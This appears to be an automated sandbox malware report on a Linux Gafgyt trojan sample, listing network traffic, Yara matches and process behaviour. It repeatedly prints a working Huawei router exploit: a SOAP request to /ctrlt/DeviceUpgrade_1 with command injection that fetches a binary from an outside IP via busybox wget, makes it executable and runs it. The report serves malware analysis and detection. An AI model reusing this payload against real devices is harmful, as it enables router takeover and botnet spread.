67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 54.134.165.245
            Source: unknownTCP traffic detected without corresponding DNS query: 41.254.115.250
            Source: unknownTCP traffic detected without corresponding DNS query: 41.170.162.96
            Source: unknownTCP traffic detected without corresponding DNS query: 41.166.16.10
            Source: unknownTCP traffic detected without corresponding DNS query: 197.107.9.134
            Source: unknownTCP traffic detected without corresponding DNS query: 157.32.148.201
            Source: unknownTCP traffic detected without corresponding DNS query: 41.178.9.75
            Source: unknownTCP traffic detected without corresponding DNS query: 41.34.158.157
            Source: unknownTCP traffic detected without corresponding DNS query: 197.106.57.232
            Source: unknownTCP traffic detected without corresponding DNS query: 157.232.100.171
            Source: unknownTCP traffic detected without corresponding DNS query: 197.203.30.151
            Source: unknownTCP traffic detected without corresponding DNS query: 157.156.3.203
            Source: unknownTCP traffic detected without corresponding DNS query: 27.233.42.33
            Source: unknownTCP traffic detected without corresponding DNS query: 197.101.95.145
            Source: unknownTCP traffic detected without corresponding DNS query: 157.242.17.129
            Source: unknownTCP traffic detected without corresponding DNS query: 41.36.237.157
            Source: unknownTCP traffic detected without corresponding DNS query: 41.250.155.229
            Source: unknownTCP traffic detected without corresponding DNS query: 157.49.109.56
            Source: unknownTCP traffic detected without corresponding DNS query: 157.44.109.50
            Source: unknownTCP traffic detected without corresponding DNS query: 41.166.175.84
            Source: unknownTCP traffic detected without corresponding DNS query: 197.197.193.126
            Source: unknownTCP traffic detected without corresponding DNS query: 197.107.138.203
            Source: unknownTCP traffic detected without corresponding DNS query: 197.146.104.254
            Source: unknownTCP traffic detected without corresponding DNS query: 192.249.108.179
            Source: unknownTCP traffic detected without corresponding DNS query: 157.245.51.226
            Source: unknownTCP traffic detected without corresponding DNS query: 41.83.159.7
            Source: unknownTCP traffic detected without corresponding DNS query: 197.8.67.166
            Source: unknownTCP traffic detected without corresponding DNS query: 197.184.27.146
            Source: unknownTCP traffic detected without corresponding DNS query: 197.199.223.14
            Source: unknownTCP traffic detected without corresponding DNS query: 41.39.108.89
            Source: unknownTCP traffic detected without corresponding DNS query: 197.71.2.245
            Source: unknownTCP traffic detected without corresponding DNS query: 41.107.179.6
            Source: unknownTCP traffic detected without corresponding DNS query: 89.178.40.44
            Source: unknownTCP traffic detected without corresponding DNS query: 157.155.222.138
            Source: unknownTCP traffic detected without corresponding DNS query: 197.100.131.123
            Source: unknownTCP traffic detected without corresponding DNS query: 119.74.171.97
            Source: unknownTCP traffic detected without corresponding DNS query: 144.113.192.15
            Source: unknownTCP traffic detected without corresponding DNS query: 157.65.94.47
            Source: unknownTCP traffic detected without corresponding DNS query: 31.109.180.222
            Source: unknownTCP traffic detected without corresponding DNS query: 41.244.140.6
            Source: unknownTCP traffic detected without corresponding DNS query: 157.216.3.85
            Source: unknownTCP traffic detected without corresponding DNS query: 197.62.217.138
            Source: unknownTCP traffic detected without corresponding DNS query: 157.169.120.73
            Source: unknownTCP traffic detected without corresponding DNS query: 8.81.35.171
            Source: unknownTCP traffic detected without corresponding DNS query: 197.160.88.131
            Source: unknownTCP traffic detected without corresponding DNS query: 157.242.118.254
            Source: unknownTCP traffic detected without corresponding DNS query: 197.199.33.234
            Source: unknownTCP traffic detected without corresponding DNS query: 197.79.11.2
            Source: unknownTCP traffic detected without corresponding DNS query: 197.174.229.247
            Source: unknownTCP traffic detected without corresponding DNS query: 197.193.62.108
            Source: mbl5k2b7z8.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: mbl5k2b7z8.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownDNS traffic detected: queries for: test.zxyes.xyz

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: mbl5k2b7z8.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: mbl5k2b7z8.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: bin/busybox
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdw5q6he3dbrsgmclkiu4to18npavj702f
            Source: classification engineClassification label: mal96.troj.linELF@0/0@1/0

            Persistence and Installation Behavior

            barindex
            Sets full permissions to files and/or directories
            Source: /bin/sh (PID: 6238)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/busybox
            Source: /bin/sh (PID: 6236)Mkdir executable: /usr/bin/mkdir -> mkdir bin
            Source: /bin/sh (PID: 6238)Chmod executable: /usr/bin/chmod -> chmod 777 bin/busybox
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1582/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/3088/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/230/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/110/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/231/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/111/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/232/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1579/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/112/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/233/cmdline
